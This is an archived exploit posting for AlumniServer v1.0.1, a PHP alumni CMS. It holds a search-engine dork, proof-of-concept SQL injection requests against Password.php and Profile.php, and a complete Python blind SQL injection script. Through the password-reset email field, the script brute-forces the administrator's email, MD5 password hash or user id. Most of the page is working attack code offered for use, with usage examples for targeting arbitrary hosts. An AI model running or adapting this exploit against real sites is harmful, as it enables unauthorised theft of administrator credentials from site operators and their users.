Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22077
HistoryJun 25, 2009 - 12:00 a.m.

(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->

2009-06-2500:00:00
vulners.com
87

#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1–>
#--------------------------------------------------------------------------------

#CMS INFORMATION:

#–>WEB: http://www.alumniserver.net/
#–>DOWNLOAD: http://www.alumniserver.net/
#–>DEMO: N/A
#–>CATEGORY: CMS/Education
#–>DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools

and companies. Services for usersinclude profile page,…

#–>RELEASED: 2009-06-11

#CMS VULNERABILITY:

#–>TESTED ON: Python 2.6
#–>DORK: "AlumniServer project"
#–>CATEGORY: BSQLi PYTHON EXPLOIT
#–>AFFECT VERSION: CURRENT
#–>Discovered Bug date: 2009-06-15
#–>Reported Bug date: 2009-06-15
#–>Fixed bug date: N/A
#–>Info patch (???): N/A
#–>Author: YEnH4ckEr
#–>mail: y3nh4ck3r[at]gmail[dot]com
#–>WEB/BLOG: N/A
#–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
#–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#------------
#CONDITIONS:
#------------

#magic quotes=OFF

#--------
#NEEDED:
#--------

#Valid email

#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------

#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded

#resetpwemail=[valid_mail]%27+and+1%3D%270 –> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 –> TRUE

#Other P0C (with a registered user):

#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 –>FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 –>TRUE

#--------------
#WATCH VIDEOS
#--------------

BSQLi –> http://www.youtube.com/watch?v=K3z7iyHttBw

AUTH BYPASS –> http://www.youtube.com/watch?v=UjDm2p7qHj0

#######################################################################
#######################################################################
##*******************************************************************##

SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 …

####
##-------------------------------------------------------------------##
##
##

GREETZ TO: SPANISH H4ck3Rs community!

##*******************************************************************##
#######################################################################
#######################################################################

#Used modules
import urllib2,sys,re,os
#Defined functions
def init():
if(sys.platform=='win32'):
os.system("cls")
os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.system("clear")

    print "\t#######################################################\n\n"
    print "\t#######################################################\n\n"
    print "\t##     AlumniServer v-1.0.1 Blind SQLi Exploit       ##\n\n"
    print "\t##       ++Conditions: magic_quotes=OFF              ##\n\n"
    print "\t##       ++Needed: Valid mail                        ##\n\n"
    print "\t##               Author: Y3nh4ck3r                   ##\n\n"
    print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n"
    print "\t##            Proud to be Spanish!                   ##\n\n"
    print "\t#######################################################\n\n"
    print "\t#######################################################\n\n"

def request(urltarget,postmsg):
req=urllib2.Request(url=urltarget,data=postmsg)
conn = urllib2.urlopen(req)
outcode=conn.read()
#print outcode #–> Active this line for debugger mode
return outcode

def error():
print "\t------------------------------------------------------------\n"
print "\tWeb isn't vulnerable!\n\n"
print "\t—>Maybe:\n\n"
print "\t\t1.-Patched.\n"
print "\t\t2.-Bad path or host.\n"
print "\t\t3.-Bad mail.\n"
print "\t\t4.-Magic quotes ON.\n"
print "\t\tEXPLOIT FAILED!\n"
print "\t------------------------------------------------------------\n"
sys.exit()

def testedblindsql():
print "\t-----------------------------------------------------------------\n"
print "\tWEB MAYBE BE VULNERABLE!\n\n"
print "\tTested Blind SQL Injection.\n"
print "\tStarting exploit…\n"
print "\t-----------------------------------------------------------------\n\n"

def helper(filename):
print "\n\t[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit\n"
print "\t[!!!] USAGE MODE: [!!!]\n"
print "\t[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]\n"
print "\t[!!!] [HOST]: Web.\n"
print "\t[!!!] [PATH]: Home Path.\n"
print "\t[!!!] [MAIL]: Mail for fish\n"
print "\t[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or
'hidden' value if admin is hidden.\n"
print "\t[!!!] Also can use 'bruteforceid' value for bruteforce admin id previously.\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo [email protected]
cd54cd7df99a\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo [email protected]
hidden\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo [email protected]
bruteforceid\n"
sys.exit()

def brute_length(urlrequest, idadmin, mail):
#Username length
flag=1
i=0
while(flag==1):
i=i+1
if(idadmin=="hidden"):

blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i)
#injected code
else:

blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i)
#injected code
output=request(urlrequest, blindsql)
if(re.search("You will receive an email shortly with a link that enables you to
reset your password.",output)):
flag=2
else:
flag=1
#This is the max length of email
if (i>50):
error()
#Save column length
length=i
print "\t<<<<<--------------------------------------------------------->>>>>\n"
print "\tLength catched!\n"
print "\tLength E-mail –> "+str(length)+"\n"
print "\tWait several minutes…\n"
print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
return length
def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
#Bruteforcing values
values=""
k=1
z=32
while((k<=lengthvalue) and (z<=126)):
#Choose method, hidden or with id
if(idadmin=="hidden"):

blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z)
#injected code
else:

blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z)
#injected code
output=request(urlrequest, blindsql)
if(re.search("You will receive an email shortly with a link that enables you to
reset your password.",output)):
values=values+chr(z)
k=k+1
z=32
#new char
z=z+1
return values

def exploiting_id (urlrequest, mail):
#Bruteforcing values
values=""
#Possible values of id
arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f']
k=1
#Max length of id = 12
while(k<=12):
for z in arrayids:

blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z)
#injected code
output=request(urlrequest, blindsql)
if(re.search("You will receive an email shortly with a link that enables you
to reset your password.",output)):
values=values+str(z)
k=k+1
z='g'
return values
#Main
init()
#Init variables
if(len(sys.argv) <= 4):
helper(sys.argv[0])

host=sys.argv[1]
path=sys.argv[2]
mail=sys.argv[3]
#Define mode: ID, hidden or bruteforceid
if(sys.argv[4]=="hidden"):
mode="hidden"
elif(sys.argv[4]=="bruteforceid"):
mode="bruteforceid"
else:
mode="usual"
idadmin=sys.argv[4]

finalrequest="http://"+host+"/"+path+"/Password.php"
testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
outcode1=request(finalrequest,testblind1)
testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
outcode2=request(finalrequest,testblind2)
#Check BSQLi
if(outcode1==outcode2):
error()
else:
testedblindsql()
if(mode=="usual"):
#Catching length of admin email
lengthadmin=brute_length(finalrequest, idadmin, mail)
mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
#Catching value of password (hashed md5)
passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
elif(mode=="hidden"):
#Catching length of admin email
lengthadmin=brute_length(finalrequest, "hidden", mail)
mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
#Catching value of password (hashed md5)
passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
else:
print "\t<<<<<--------------------------------------------------------->>>>>\n"
print "\tBruteforcing id. Wait a few minutes…\n"
print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
#Catching value of admin id
idadmin=exploiting_id(finalrequest, mail)

print "\n\t\t*************************************************\n"
print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY********\n"
print "\t\t*************************************************\n\n"
#Mode usual and hidden
if((mode=="usual") or (mode=="hidden")):
print "\t\tAdmin-mail: "+mailadmin+"\n\n"
print "\t\tPassword hash: "+passwordhash+"\n\n"
else:
#Mode bruteforceid
print "\t\tAdmin-id: "+idadmin+"\n\n"
print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
print "\t\t<<------------------------EOF---------------------->>\n\n"